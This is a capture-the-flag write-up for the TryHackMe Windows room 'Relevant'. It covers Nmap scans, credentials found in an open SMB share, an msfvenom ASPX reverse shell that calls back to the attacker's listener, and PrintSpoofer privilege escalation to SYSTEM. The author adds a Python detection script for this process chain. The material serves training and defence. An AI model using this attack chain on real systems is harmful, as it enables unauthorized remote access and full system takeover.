#tryhackme #windows #medium
![[Pasted image 20250710233019.png]]
---
# Information Gathering - Nmap
TCP scan against all ports reveals 8 open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:51 CDT
Nmap scan report for 10.10.124.72
Host is up (0.12s latency).
Not shown: 65527 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 43.95 seconds
```
A second TCP scan of the open ports with `-sCV` (default scripts plus version detection) gives more detailed information.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 80,135,139,445,3389,49663,49666,49667
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:54 CDT
Nmap scan report for 10.10.124.72
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2025-07-10T01:49:40
|_Not valid after: 2026-01-09T01:49:40
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2025-07-11T01:55:28+00:00
|_ssl-date: 2025-07-11T01:56:07+00:00; -1s from scanner time.
49663/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-07-10T18:55:31-07:00
| smb2-time:
| date: 2025-07-11T01:55:29
|_ start_date: 2025-07-11T01:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.10 seconds
```
UDP scan against the top 10 ports; every port comes back `open|filtered`, so this scan is inconclusive.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:57 CDT
Nmap scan report for 10.10.124.72
Host is up (0.12s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
```
---
# Footprinting
##### Port 445 - SMB
I tried listing shares with `smbclient` against the IP address, and it actually revealed 4 available shares. The share `nt4wrksv` stood out to me because the rest of the shares are default ones.
```bash
root@ip-10-10-151-101:~# smbclient -N -L $IP
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
```
The share `nt4wrksv` allowed a null session, meaning we are authenticated to the share without a password. In the share, there was only one file, named `passwords.txt`.
```bash
root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 25 22:46:04 2020
.. D 0 Sat Jul 25 22:46:04 2020
passwords.txt A 98 Sat Jul 25 16:15:33 2020
7735807 blocks of size 4096. 4950767 blocks available
smb: \>
```
Inside the file, the first line read `User Passwords - Encoded` and the other two lines appeared to be Base64-encoded. After decoding them, I found two sets of credentials. I tried to connect to RDP with the found credentials but failed.
![[Pasted image 20250710213753.png]]
The Nmap `vuln` script set reports that the SMB service on port 445 is vulnerable to MS17-010 (`CVE-2017-0143`).
```bash
root@ip-10-10-151-101:~# nmap --script vuln $IP -p 139,445
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-11 04:24 BST
Nmap scan report for ip-10-10-218-16.eu-west-1.compute.internal (10.10.218.16)
Host is up (0.00012s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:44:41:DC:80:7B (Unknown)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds
```
##### Port 80
The landing page of the service on Port 80 is just a Microsoft IIS default page.
![[Pasted image 20250710213908.png]]
`gobuster` found several paths, but all of them returned 400 and none was accessible.
```bash
root@ip-10-10-151-101:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.218.16
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww (Status: 400) [Size: 3420]
/q%26a (Status: 400) [Size: 3420]
/http%3A (Status: 400) [Size: 3420]
/**http%3a (Status: 400) [Size: 3420]
/*http%3A (Status: 400) [Size: 3420]
/**http%3A (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww (Status: 400) [Size: 3420]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
```
# Exploit - Initial Access
##### Port 49663
`Gobuster` returned the same results as on port 80, and I couldn't find any leads to move forward from there. Then I tried browsing to the name of the share we found on the SMB server, and it actually worked: the entire contents of `nt4wrksv` are served directly over HTTP on port 49663, i.e. the share directory sits inside the web root of this IIS site.
![[Pasted image 20250710223955.png]]
I'm going to upload a reverse shell payload to the SMB share `nt4wrksv` and take advantage of the fact that it's accessible via a web browser to trigger the shell.
I'm using `msfvenom` to create the reverse shell payload in `.aspx` format, since the web server is `IIS`, which handles `.aspx` files by default.
```bash
root@ip-10-10-151-101:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.151.101 LPORT=1234 -f aspx -o revshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3414 bytes
Saved as: revshell.aspx
```
```bash
root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put revshell.aspx
putting file revshell.aspx as \revshell.aspx (1666.9 kb/s) (average 1667.0 kb/s)
smb: \> ls
. D 0 Fri Jul 11 04:53:47 2025
.. D 0 Fri Jul 11 04:53:47 2025
passwords.txt A 98 Sat Jul 25 16:15:33 2020
revshell.aspx A 3414 Fri Jul 11 04:53:47 2025
7735807 blocks of size 4096. 5138963 blocks available
smb: \>
```
![[Pasted image 20250710225453.png]]
```bash
root@ip-10-10-151-101:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.218.16 49898
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
```
In `C:\Users\Bob\Desktop`, I found `user.txt`.
![[Pasted image 20250710225601.png]]
# Privilege Escalation
While enumerating for privilege-escalation clues, the `whoami /priv` command revealed that the current user (the `iis apppool\defaultapppool` identity from the `whoami` output above) has `SeImpersonatePrivilege` enabled.
![[Pasted image 20250710231321.png]]
We are going to use the `PrintSpoofer64.exe` binary to abuse this privilege. To do so, we first download the binary on our Kali machine and then transfer it over to the remote Windows system.
`wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe`
![[Pasted image 20250710232252.png]]
![[Pasted image 20250710232641.png]]
`PrintSpoofer64.exe -i -c powershell` instantly spawns an interactive PowerShell session as `SYSTEM`.
![[Pasted image 20250710232746.png]]
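Both stages of this chain leave a distinctive process tree that a defender can alert on: the IIS worker spawning `cmd.exe` as the app-pool identity (the reverse shell above), and a descendant of that shell coming up as `SYSTEM` (the PrintSpoofer step). As an added example that is not part of the original writeup, the following Python detection runs two rules over constructed Sysmon-style process-creation records; the field names, pids and file paths are assumptions.

```python
"""Detection for the chain in this writeup: the IIS worker (w3wp.exe) spawning a
shell as the app-pool identity, then a descendant of that shell running as SYSTEM
after SeImpersonatePrivilege abuse. Fields are assumed Sysmon Event ID 1 style."""

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SERVICE_ACCOUNTS = {"nt authority\\system", "nt authority\\local service",
                    "nt authority\\network service"}

# Constructed sample events (not real logs); pids, paths and order are made up.
SAMPLE_EVENTS = [
    {"pid": "900", "ppid": "500", "image": r"C:\Windows\System32\services.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"pid": "1100", "ppid": "700", "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "user": r"IIS APPPOOL\DefaultAppPool"},
    # the .aspx reverse shell: IIS worker spawns cmd.exe as the app-pool identity
    {"pid": "2200", "ppid": "1100", "image": r"C:\Windows\System32\cmd.exe",
     "user": r"IIS APPPOOL\DefaultAppPool"},
    # privilege-escalation tool launched from that shell (path is constructed)
    {"pid": "2300", "ppid": "2200", "image": r"C:\Windows\Temp\PrintSpoofer64.exe",
     "user": r"IIS APPPOOL\DefaultAppPool"},
    # its child comes up as SYSTEM although the parent ran as the app-pool user
    {"pid": "2400", "ppid": "2300", "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # benign: the service control manager (SYSTEM) starting a SYSTEM child
    {"pid": "3000", "ppid": "900", "image": r"C:\Windows\System32\cmd.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
]


def detect(events):
    """Return (rule, pid) pairs for process-creation events worth alerting on."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue  # parent outside the window we were given; nothing to compare
        child = e["image"].rsplit("\\", 1)[-1].lower()
        pimage = parent["image"].rsplit("\\", 1)[-1].lower()
        cuser, puser = e["user"].lower(), parent["user"].lower()
        # Rule 1: an IIS worker process has no business spawning a shell.
        if pimage == "w3wp.exe" and child in SHELLS:
            findings.append(("iis_worker_spawned_shell", e["pid"]))
        # Rule 2: child runs as a service account but its direct parent did not.
        # Legitimate SYSTEM processes descend from SYSTEM parents (services.exe), so
        # an app-pool or user account jumping to SYSTEM points at token impersonation.
        if cuser in SERVICE_ACCOUNTS and puser not in SERVICE_ACCOUNTS:
            findings.append(("privilege_jump_in_child", e["pid"]))
    return findings
```

Rule 2 will also fire on any other tool that abuses `SeImpersonatePrivilege`, since they all produce the same app-pool-to-SYSTEM parent/child jump.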
Found `root.txt`.
![[Pasted image 20250710232946.png]]